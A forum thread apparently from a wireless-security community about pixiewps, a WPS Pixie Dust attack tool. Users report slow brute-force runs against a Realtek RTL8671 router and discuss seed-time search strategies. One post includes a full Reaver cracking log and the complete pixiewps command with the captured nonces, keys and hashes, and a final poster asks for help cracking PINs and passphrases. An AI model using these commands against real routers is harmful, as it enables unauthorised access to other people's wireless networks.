Thread: Pixiewps: wps pixie dust attack tool

  1. #1
    Hello, @Wiire @Kcdtv


    Chipset: Realtek RTL8671

    Computer: Test computer, processor 1.9 GHz, 1 GB RAM .. (800 key/sec)

    Command: pixiewps -e -r -s -z -a -n -f

    I'm waiting for 3 hours and Pixiewps is continuing...

    What can I do? Suggestion?

    a) Give up

    b) Continue, no risk no fun


  2. #2
    We have more or less the same power (I said 600 but it can go to 800 when it goes full power) and to go back to 2012 it took more than 15 minutes...
    But wiire has been told that some Realtek chipsets could go back to 1970,
    so if you can leave it that would be great.
    This chipset could be the one... it is not from the X project series, so it has a good chance.
    Thinking about pixiewps, maybe it would be a good idea to have just one try with seed 1970 at the beginning of the brute force and then start the brute force backward.
    I was also thinking about an option that allows defining a point in time.
    Let's say I choose 01-01-2012 00:00.
    Then the brute force would start from the defined time to today's time, and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like two sequences).
    That may be a bit weird and strange but I thought it may be interesting.
    cheers

  3. #3
    Quote Originally Posted by kcdtv View Post
    We have more or less the same power (I said 600 but it can go to 800 when it goes full power) and to go back to 2012 it took more than 15 minutes...
    But wiire has been told that some Realtek chipsets could go back to 1970,
    so if you can leave it that would be great.
    This chipset could be the one... it is not from the X project series, so it has a good chance.
    Thinking about pixiewps, maybe it would be a good idea to have just one try with seed 1970 at the beginning of the brute force and then start the brute force backward.
    I was also thinking about an option that allows defining a point in time.
    Let's say I choose 01-01-2012 00:00.
    Then the brute force would start from the defined time to today's time, and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like two sequences).
    That may be a bit weird and strange but I thought it may be interesting.
    cheers
    Yes, now that pixiewps 1.1 is out we can collect data and decide how to optimize it best in a future release. As I said, I run it on my desktop PC, which takes only 20 minutes to exhaust the keyspace so... yeah...

    If some of you get:

    "[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data."

    But it doesn't find the PIN after the --force bruteforce (and your computer time is OK), let me know. I assumed that the router cannot have its time set to the future but... you never know...

  4. #4
    Quote Originally Posted by Saydamination View Post
    Hello, @Wiire @Kcdtv


    Chipset: Realtek RTL8671

    Computer: Test computer, processor 1.9 GHz, 1 GB RAM .. (800 key/sec)

    Command: pixiewps -e -r -s -z -a -n -f

    I'm waiting for 3 hours and Pixiewps is continuing...

    What can I do? Suggestion?

    a) Give up

    b) Continue, no risk no fun

    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

  5. #5
    Quote Originally Posted by wiire View Post
    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.
    Hello Wiire,

    Test finished ... I'm not lucky..

    Reaver Results:

    Code:
    Associated with 90:F6:52:xX:xX:BX (ESSID: x)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
    [P] PKR: d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73
    [P] AuthKey: ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a
    [+] Sending M2 message
    [P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
    [P] E-Hash2: f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be
    [Pixie-Dust]  
    [Pixie-Dust]   Pixiewps 1.1
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 13 s
    [Pixie-Dust]  
    [Pixie-Dust]   [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    Pixiewps Results:

    Code:
    pixiewps -f -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73 -s 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c -z f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be -a ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a -n 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    
     Pixiewps 1.1
    
     [-] WPS pin not found!
    [*] Time taken: 27220 s
    Pin:12345670
    Last edited by Saydamination; 2015-05-16 at 21:08. Reason: Add pin

  6. #6
    Quote Originally Posted by Saydamination View Post
    Hello Wiire,

    Test finished ... I'm not lucky..

    Code:
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    There's something utterly strange in that nonce. Try to capture a session with Wireshark and see if it matches the nonce reaver prints you.
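
One structural property that can be read directly off the E-Nonce quoted above: taken as four 32-bit big-endian words, the upper two bytes of every word are zero, while the R-Nonce from the same log shows no such padding. The Python check below is an added example, not part of the thread or of reaver/pixiewps; the function names and the `MIN_PADDED_WORDS` threshold are assumptions chosen for this illustration.

```python
import re

# Nonce lines copied from the Reaver output quoted in the thread.
SAMPLE_LOG = """\
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    [P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
"""

NONCE_RE = re.compile(
    r"\[P\]\s+([ER])-Nonce:\s*((?:[0-9a-fA-F]{2}:){15}[0-9a-fA-F]{2})\s*$",
    re.MULTILINE,
)

# Assumed threshold: two or more zero-padded words is already far outside
# what a uniformly random 128-bit nonce produces (roughly 6 in 2**32).
MIN_PADDED_WORDS = 2


def parse_nonces(log_text):
    """Return {"E-Nonce": bytes, "R-Nonce": bytes} for the lines found."""
    return {
        f"{m.group(1)}-Nonce": bytes.fromhex(m.group(2).replace(":", ""))
        for m in NONCE_RE.finditer(log_text)
    }


def audit_nonce(nonce):
    """Split a 16-byte nonce into 32-bit words and report padding structure."""
    if len(nonce) != 16:
        raise ValueError("WPS nonces are 16 bytes")
    words = [int.from_bytes(nonce[i:i + 4], "big") for i in range(0, 16, 4)]
    padded = sum(1 for w in words if w >> 16 == 0)
    return {
        "words": [f"{w:08x}" for w in words],
        "zero_high_halves": padded,
        # Bits left once the zero-padded upper halves are excluded.
        "max_variable_bits": 128 - 16 * padded,
        "suspicious": padded >= MIN_PADDED_WORDS,
    }


if __name__ == "__main__":
    for name, value in parse_nonces(SAMPLE_LOG).items():
        print(name, audit_nonce(value))
```

Running the same check over the nonce seen in a Wireshark capture of the session shows whether the padding is really on the wire or only in what reaver prints.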

  7. #7
    Pixiewps not getting Hash File

    Quote Originally Posted by wiire View Post
    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.
    Dear Wiire,
    I am not getting error: Pixiewps not getting Hash File

    I only get E-Nonce, PKE, R-Nonce, PKR and AuthKey only, no hash

    Please give me further guidance so that I can crack PINs and passphrase

    Thanks in advance
    jenisbob
